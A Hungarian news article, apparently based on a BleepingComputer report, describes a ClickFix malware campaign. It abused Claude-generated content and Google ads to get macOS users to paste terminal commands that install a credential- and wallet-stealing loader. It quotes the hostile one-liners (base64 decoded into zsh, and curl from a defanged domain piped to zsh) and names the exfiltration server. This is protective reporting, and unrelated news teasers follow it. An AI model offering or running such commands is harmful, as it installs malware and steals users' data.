Több mint 10 000 macOS-felhasználót vertek át csalók, akik az MI, pontosabban a Claude LLM által generált tartalmakat és Google-hirdetéseket használnak adatlopó kártevők terjesztésére. A ClickFix néven ismert támadási hullámban a felhasználók elsőre ártalmatlannak tűnő keresésekhez – például online DNS‑feloldó, macOS‑parancssori lemezhely‑elemző vagy Homebrew – kapnak veszélyes válaszokat. Ezek között akár Claude‑artefaktumokra vagy Apple Supportnak álcázott Medium-cikkekre vezető linkek is szerepelnek.
Ártalmas parancsok a parancssorban
A támadók kétféle variációban terjesztik a kártevőt: a felhasználót mindkét esetben arra veszik rá, hogy egy speciális shellparancsot illesszen be a Terminálba. Az egyik verzióban az “echo “…” | base64 -D | zsh”, a másikban a “true && cur””l -SsLfk –compressed “https://raxelpak[.]com/curl/[hash]” | zsh” parancsot használják. Ezek végrehajtásakor a rendszer letölt egy kártevő‑betöltőt, amely érzékeny adatokat gyűjt, például kulcskarika‑adatokat, böngészőadatokat és kriptotárcákat.
Profi adatlopás és eltüntetés
A lopott adatokat a rendszer egy /tmp/osalogging.zip állományba csomagolja, majd az a2abotnet[.]com/gate szerverre küldi őket. Ha elsőre nem sikerül az elküldés, a kártevő az archívumot kisebb darabokra töri, és akár nyolcszor is újra próbálkozik. Sikeres adatküldés után minden nyomot eltakarít a rendszerről, hogy minimálisra csökkentse a lelepleződés esélyét.
A támadók ugyanazt a háttérinfrastruktúrát használják: korábban már hasonló támadást indítottak a ChatGPT-n és a Grokon keresztül is, most pedig már a Claude-ot is kihasználják. Ez azt jelzi, hogy a csalók egyre több MI‑modellt vonnak be a támadásokba. A szakértők mindenkit óvatosságra intenek: csak akkor futtass terminálparancsokat, ha teljesen biztos vagy a forrásban – akár az MI-t is megkérdezheted ugyanabban a beszélgetésben, hogy megbizonyosodj a parancs biztonságáról.
2025, adrienne, www.bleepingcomputer.com alapján
filózó
Te megbíznál egy mesterséges intelligencia által ajánlott parancsban?
Ha észrevennéd, hogy valaki ilyennel próbál átverni, szólsz másoknak is?
A Survivor – Görögország (Survivor Greece) forgatását azonnali hatállyal leállították, miután egy fiatal versenyző, Stavros Floros életveszélyes balesetet szenvedett...
A technológiai átalakulás új korszakát éljük, ahol a fejlett algoritmusok már nemcsak támogatják, hanem egyre inkább kiváltják azokat a szakértői feladatokat, amelyekben az embereknek fejlődniük kellene...
A GameSir G8+ MFi jelentős előrelépés a mobil játékvezérlők világában, amely a G8 Galileo bevált tulajdonságait vette alapul, majd szinte minden kritikus ponton továbbfejlesztette azt...
Kételyek merültek fel, hogy a nemrég megjelent, Mixtape című történetközpontú játék hamarosan eltűnhet a digitális boltokból a zeneszámok licencproblémái miatt...
Hihetetlen, de mégis igaz, hogy az Egyesült Államokban működő adatközpontok évente annyi áramot fogyasztanak, amellyel több mint 16 millió otthon energiaigényét lehetne fedezni...
Kenya elképesztő technológiai ugrásra készült, amikor májusban bejelentették a G42 és a Microsoft közös, 1 milliárd dolláros adatközpont-beruházását...
Csak három évvel a megjelenése után végleg eltűnik a digitális boltok polcairól a LEGO 2K Gyorsulás (LEGO 2K Drive), az a nyílt világú versenyjáték, ahol saját építésű járgányaiddal száguldozhatsz...
😐 Ez a jelenség jól illusztrálható azzal, hogy ha egy alkotó bármilyen megjegyzést tesz egy legendás játék folytatásáról, az internetes rajongók azonnal az új rész bejelentését vizionálják...
Mi fűzte össze ezt a napot? Alkotmányok 📜, háborúk ⚔️ és történelmi első alkalmak 🚆 formálták a világot: Norvégia alkotmánya, a Boshin-háború lezárása, a Watergate-ügy nyilvános szenátusi meghallgatásai és az első legális azonos nemű házasságok mind ide kötődnek...
💪 Ami kezdetben ártalmatlannak tűnt, az utóbbi években jelentősen megváltozott: világszerte milliók home office-ba kényszerültek, ami alaposan átrajzolta, mit várunk el az irodabútortól...
A közelmúltban egy tengerjáró hajón történt hantavírus-kitörés miatt jelenleg mintegy 150 utast figyelnek meg, illetve akár hathetes karanténba is helyeznek...
🕵 Egy 17. századi marylandi temető különös titkot rejtett: egy mindössze nyolcéves fiú földi maradványait találták meg, aki túlnyomórészt afrikai származású volt...
Az agyunk működése mögötti titkos összetevőkre újabb fény vetült: amerikai kutatók felfedezték, hogy a tartós szorongással élőknél kimutathatóan kevesebb található egy létfontosságú agyi tápanyagból, amelyet az emberek többsége amúgy is hiányosan visz be...
💰 Az új Gmail-fiókok tulajdonosai néhány országban kellemetlen meglepetéssel szembesülnek: a megszokott 15 GB ingyenes tárhely helyett kezdetben csak 5 GB-ot kapnak...
🤒 Az öregedéssel és krónikus betegségekkel kapcsolatban egészen új tényezőt fedeztek fel a kutatók: a bélben képződő parányi részecskék, úgynevezett exoszómák is kulcsszerepet játszhatnak a szervezet gyulladásos folyamataiban...
A Metroid Dread fejlesztőjeként ismert MercurySteam komoly változások elé néz: a stúdió kénytelen volt elbocsátásokat bejelenteni, miközben legújabb akciójátékuk, a God of War-hangulatú Blades of Fire végre Steamen is elérhetővé vált...
Több mint 1600 kilométerrel Ecuador partjaitól nyugatra, a Csendes-óceán mélyén található Gofar-törésvonal már legalább harminc éve szinte óraműpontossággal produkál nagy, 6-os erősségű földrengéseket...
💫 A tudósoknak most először sikerült közvetlenül lefotózniuk a kozmikus hálót, vagyis azt a rejtett, óriási anyaghálózatot, amely a galaxisokat kapcsolja össze az univerzumban...
A decentralizált pénzügyek (DeFi) világa új korszakhoz érkezett: a KelpDAO-nál történt közel 108 milliárd forintnyi (293 millió dollár) értékű hackertámadás világossá tette, hogy már nem elsősorban a programozási hibák jelentik a fő veszélyt, hanem a rendszerek egyre növekvő összetettsége és a mögöttes infrastruktúra...
⚽ A 2026-os FA Kupa-döntőben két olyan csapat csap össze, amelyek számára kulcsfontosságú a győzelem – bár mindkettő csalódásokkal teli időszakot igyekszik felejteni...